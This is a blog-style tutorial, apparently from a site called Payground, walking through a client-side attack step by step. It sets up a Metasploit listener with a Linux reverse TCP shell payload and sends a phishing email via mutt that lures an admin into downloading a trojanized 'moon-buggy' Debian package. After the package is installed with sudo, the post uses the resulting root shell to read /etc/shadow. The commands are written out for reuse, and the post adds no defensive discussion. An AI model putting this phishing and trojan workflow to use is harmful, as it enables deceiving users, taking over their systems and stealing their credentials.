• Lucifer

Client Side Exploitation

In the Spear Phishing post HERE we saw how a malicious file can be delivered to a system by tricking a user into downloading and running a malicious executable. In this post, we will see how a malicious Debian package, when opened and installed on a target system, can provide an attacker with remote access to the system. So, let's see how we can do client-side exploitation step by step:

Client Side Exploitation

Step 1: Starting Metasploit Framework

First, we need to set up a listener that will wait for incoming connections. Launch the Metasploit Framework by entering the following command:

msfconsole -L

Client Side Exploitation

Step 2: Selecting Module

For this post we will use Generic Payload Handler, which provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework. Select the module by entering the following command:

use exploit/multi/handler

Client Side Exploitation

Step 3: Configuring Listener

Now let's configure the module to listen on the TCP port 4444 on our localhost IP and select the shell/reverse_tcp payload:


set LPORT 4444

set PAYLOAD linux/x86/shell/reverse_tcp

Client Side Exploitation

Step 4: Starting Listener

Now start the listener by entering exploit.


Client Side Exploitation

Now create a new tab by command Ctrl + Shift + T and switch to a new tab.

Step 5: Sending Phishing Email

For this attack we will send a download link rather than an attachment. The following command will send an invitation to download a game from a website:

echo "Check out this cool game! Download from <a href="http://skillsetlocal.com/moon-buggy.deb">here</a> for FREE." | mutt -e "set content_type=text/html" -s "Game Download" -- admin@skillsetlocal.com

Client Side Exploitation

Step 6: Checking Email

We will use mutt again to read the email:


Client Side Exploitation

Step 7: Reading Email

You should see our email in the inbox. Hit Enter to open it.

Client Side Exploitation

Next, hit v to view the attachment (which, in this case, is just the body of the email). Hit Enter to open it.

Client Side Exploitation

You should see our phishing email message with the download link highlighted in yellow.

Step 8: Downloading File

Hit Enter to follow the link, then hit d to download.

Client Side Exploitation

Next, use the down arrow key to select Save to disk and hit Enter.

Client Side Exploitation

Hit Enter again to accept the default filename.

Client Side Exploitation

Step 9: Installing Package

Exit mutt by hitting q, i, and q again (or press** Ctrl+C** and then Enter to confirm). Now let's install the downloaded package with the following command:

sudo dpkg -i moon-buggy.deb

Client Side Exploitation

Do you see anything unusual? No. The package is installing as normal, without any red flags being raised. Now let's return to our listener.

Again switch to tab 1.

Step 10: Using Reverse Shell

Let's see what kind of access we got. Enter the following command to get the user ID:


We are running as root! To confirm, let's read the /etc/shadow file:

cat /etc/shadow

Client Side Exploitation

Game over. Now again switch tabs.

Step 11: Playing Game

All quiet here. The admin user can enjoy the "cool free game" while the attacker is enjoying the root access to the system.

Enter moon-buggy to play the game. You can see that the package is fully functional, with a Trojan added as a "bonus feature".


Client Side Exploitation

Also read: Spearphishing

That's it for this post hope you like it, please share it with your friends and more amazing stuff is waiting for you, checkout shop at Payground or visit HERE.

24 views0 comments

Recent Posts

See All

©2020 by Payground. Proudly created with Wix.com